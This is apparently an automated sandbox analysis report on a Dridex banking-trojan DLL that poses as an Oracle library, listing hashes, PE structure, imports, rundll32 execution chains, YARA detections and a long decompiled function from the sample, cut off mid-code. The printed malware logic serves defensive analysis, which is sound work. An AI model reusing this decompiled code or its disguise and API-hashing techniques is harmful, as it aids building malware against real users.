Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE719.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4702
Entropy (8bit):	4.509012825849277
Encrypted:	false
SSDEEP:	48:cvIwSD8zsMJgtWI9lJWSC8Bw8fm8M4JCdsg1hFW+q8/bRB74SrSy6d:uITfKi4SNnJRiDWy6d
MD5:	7BA38ADD8078CF8D9CFF70116D6B4BAD
SHA1:	0394B79008EB015FDEF563EFB924D2CD26306B4E
SHA-256:	185C14D15B3E100BA4BDDA1DF178413997FDEBD032C06A0DDBCCA725878287D8
SHA-512:	6A25F73F402C7085A7967D59B92FF501773469E10A0ECE561454D6C3DDA91639A9455A966579A2F699DF08ECAF822FA372C4543FDC77CF3F133EB477D8D881A9
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309791" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.220615082225044
Encrypted:	false
SSDEEP:	12288:UCP8DFT5D2QBlnLMwu/YUsfJEK3Su8OnAZ/Vm7KXJM+cG0sWkd9uKI:dP8DFT5D2QLnLMYyG7cp
MD5:	C6AF9596366A6BF1F7A87463D3A727F6
SHA1:	CBDC81F0F3DDCF1CAA46C0DF77A976BF46A1BE46
SHA-256:	A30927016FFD0BB30075B09D7ED4C0E1264051B5221266251C771409FAE7FD84
SHA-512:	86E1EB7343609099D6BDF3E81FA77423C1BF62F4381DF59B45123311AF62F6DAC03AE4A4221D440D34A5F630219E5DAE8BFDD47DD803F35CCDA1B214FD90F21B
Malicious:	false
Reputation:	low
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...5................................................................................................................................................................................................................................................................................................................................................]..h........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.525940103304831
Encrypted:	false
SSDEEP:	384:h1zG52nIrnc8dTVgG+K0XLmnQFRfovOglS:bzoeAc8xVgGt0XCnQFyvP
MD5:	1E5951D0D20698671D3318D9B4A9B59A
SHA1:	47C6D1CCB4D94AD8A6C9331D714B5BA48C08233B
SHA-256:	72F0D30957C386D8378726F90317A3B0995300B84DAF184A9BA0A378C51127B2
SHA-512:	FDD292F226F25A573900DB774749268EFC030A0E75445206A31A170FE6F5B560E6207C616255F71A6B0453290E54205CFDFF32DA5C4D341D02E2A868A5298264
Malicious:	false
Reputation:	low
Preview:	regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...5................................................................................................................................................................................................................................................................................................................................................[..hHvLE.N......U...........\...)..\.....RG.................`... ..hbin................p.\..,..........nk,....5.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....5........ ........................... .......Z.......................Root........lf......Root....nk ....5.....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322499724962691
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll
File size:	544768
MD5:	9e01fd2137e4b2b6e5bec3c7e3e40a77
SHA1:	da6ef7a2e64e977b43801e75c2f063ca7094dc3f
SHA256:	07c08b4a043b8bc8bea97f36414ae42ade74a37c4d5542727fe6fb0644a48a71
SHA512:	4e47f592ab935097fb908459d6ffb5112266ba92c76d26ac049af5658c56afbf25f53417b7543340296268ef28c15d3dd0666f2fd55cad2f546bf43e4ce523a1
SSDEEP:	6144:0S+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pME:0St2UAogoOwhx7nA4+pMbg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007FA61C70D221h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007FA61C710DAAh
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391775948661	data	4.48058788048	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316224709535	data	7.44063137807	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x8fe	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6564 Parent PID: 1236

General

Start time:	20:40:22
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll"
Imagebase:	0xce0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6560 Parent PID: 6564

General

Start time:	20:40:22
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 576 Parent PID: 6560

General

Start time:	20:40:23
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1
Imagebase:	0xb50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.358625474.000000006F321000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.360380843.000000006F321000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.393412390.000000006F321000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6292 Parent PID: 576

General

Start time:	20:40:27
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 684
Imagebase:	0x980000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6564 Parent PID: 1236 loaddll32.exeCOMMON

Executed Functions

Function 6F330730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6F330730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6f33d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6F33361C(0x30);
					 *0x6f33d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6F333698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6F33306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6f33d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6F330FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6f33d1f8 + 0xb)) = _t162;
					_t363 = E6F33306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6f33d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6F330730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6f33bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6F32F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6F32F828(_t429 + 0x24, E6F32F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6F32F4BC(_t429 + 0x24, E6F32F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6F335580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6F32F654(_t429 + 0x20);
							E6F3355B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6F335864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6F32DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6F3355B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6F335864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6F32DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6F3355B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6F335864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6F32DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6F32CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6F335558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6F32CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6F335558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6F32CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6F335558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6F32CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6F335558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6F32CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6F335558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6F32CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6F335558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6f33d1f8 + 0x24)) = _t189;
							_t190 = E6F331030(0xffffffffffffffff);
							_t320 =  *0x6f33d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6f33d1f8 + 0x2c)) = E6F3310A4(0x6f33d1f8, 0xffffffffffffffff);
								L78:
								if(E6F33306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6f33d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6F33306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6f33d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6F3335F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6F3335F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6F32F584(_t429 + 0x18c, _t206);
								_t411 = E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6F32F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6F32F4BC(_t429 + 0x18c, 0);
								_t213 = E6F32F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6F3335F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6F32F4BC(_t429 + 0x18c, 0);
								E6F32DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6F33306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6F32DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6F33306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6F32E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6F334FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6F32E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6F32DFA4(_t429 + 0x1b8);
								E6F32DFA4(_t429 + 0x1b0);
								E6F32F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F32BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6f33d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F32BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6F3335F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6F3335F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
